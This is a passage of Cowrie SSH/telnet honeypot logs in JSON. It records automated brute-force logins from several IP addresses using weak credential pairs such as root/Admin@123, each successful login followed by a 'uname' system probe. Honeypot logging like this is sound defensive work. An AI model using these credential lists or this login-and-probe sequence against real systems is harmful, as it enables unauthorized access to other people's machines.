ac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:45.037608Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:12:45.911256Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:12:46.429801Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:12:46.430498Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:46.650840Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:46.651958Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":50380,"dst_ip":"1.2.3.4","dst_port":23,"session":"b59c93f0409b","protocol":"telnet","message":"New connection: 8.222.212.69:50380 (1.2.3.4:23) [session: b59c93f0409b]","sensor":"my-vps","timestamp":"2025-08-28T07:12:50.683920Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33420,"dst_ip":"1.2.3.4","dst_port":22,"session":"28260b3b5541","protocol":"ssh","message":"New connection: 212.227.235.229:33420 (1.2.3.4:22) [session: 28260b3b5541]","sensor":"my-vps","timestamp":"2025-08-28T07:12:51.401852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:51.402519Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:51.656685Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:12:52.421501Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:12:52.947473Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:12:52.948350Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:53.207530Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:53.208877Z","src_ip":"212.227.235.229","session":"28260b3b5541"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36926,"dst_ip":"1.2.3.4","dst_port":22,"session":"473e3cada87d","protocol":"ssh","message":"New connection: 212.227.125.160:36926 (1.2.3.4:22) [session: 473e3cada87d]","sensor":"my-vps","timestamp":"2025-08-28T07:13:01.186270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:01.187211Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:01.407349Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:02.064914Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:02.617135Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:02.617897Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:02.841999Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:02.843344Z","src_ip":"212.227.125.160","session":"473e3cada87d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":12692,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d529564729c","protocol":"ssh","message":"New connection: 80.94.95.15:12692 (1.2.3.4:22) [session: 8d529564729c]","sensor":"my-vps","timestamp":"2025-08-28T07:13:05.951465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:13:06.177211Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:13:06.286548Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma","message":"login attempt [alma/alma] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:07.037383Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1","message":"login attempt [alma/alma1] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:08.142924Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37816,"dst_ip":"1.2.3.4","dst_port":22,"session":"4936404170ab","protocol":"ssh","message":"New connection: 212.227.235.229:37816 (1.2.3.4:22) [session: 4936404170ab]","sensor":"my-vps","timestamp":"2025-08-28T07:13:08.819251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:08.820870Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma123","message":"login attempt [alma/alma123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:09.246407Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:09.778892Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1234","message":"login attempt [alma/alma1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:11.008860Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:11.215451Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:11.740517Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:11.741174Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:11.994996Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:11.996093Z","src_ip":"212.227.235.229","session":"4936404170ab"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma12345","message":"login attempt [alma/alma12345] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:12.541074Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:13.644238Z","src_ip":"80.94.95.15","session":"8d529564729c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58848,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ce0a919cac8","protocol":"ssh","message":"New connection: 212.227.125.160:58848 (1.2.3.4:22) [session: 3ce0a919cac8]","sensor":"my-vps","timestamp":"2025-08-28T07:13:17.711473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:17.725451Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:17.935542Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:18.807447Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:19.373343Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:19.374146Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:19.593730Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:19.595200Z","src_ip":"212.227.125.160","session":"3ce0a919cac8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58826,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a2c23045c5","protocol":"ssh","message":"New connection: 212.227.235.229:58826 (1.2.3.4:22) [session: f0a2c23045c5]","sensor":"my-vps","timestamp":"2025-08-28T07:13:24.173056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:24.174233Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:24.424751Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:25.175630Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:25.765892Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:25.766884Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:26.023943Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:26.025095Z","src_ip":"212.227.235.229","session":"f0a2c23045c5"}
{"eventid":"cowrie.session.closed","duration":35.57739233970642,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:26.261238Z","src_ip":"8.222.212.69","session":"b59c93f0409b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33242,"dst_ip":"1.2.3.4","dst_port":22,"session":"d537dcba8260","protocol":"ssh","message":"New connection: 212.227.125.160:33242 (1.2.3.4:22) [session: d537dcba8260]","sensor":"my-vps","timestamp":"2025-08-28T07:13:34.025044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:34.025908Z","src_ip":"212.227.125.160","session":"d537dcba8260"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:34.246782Z","src_ip":"212.227.125.160","session":"d537dcba8260"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:34.908089Z","src_ip":"212.227.125.160","session":"d537dcba8260"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:36.126211Z","src_ip":"212.227.125.160","session":"d537dcba8260"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44370,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f5c82594b6d","protocol":"ssh","message":"New connection: 212.227.235.229:44370 (1.2.3.4:22) [session: 4f5c82594b6d]","sensor":"my-vps","timestamp":"2025-08-28T07:13:40.534932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:40.535656Z","src_ip":"212.227.235.229","session":"4f5c82594b6d"}
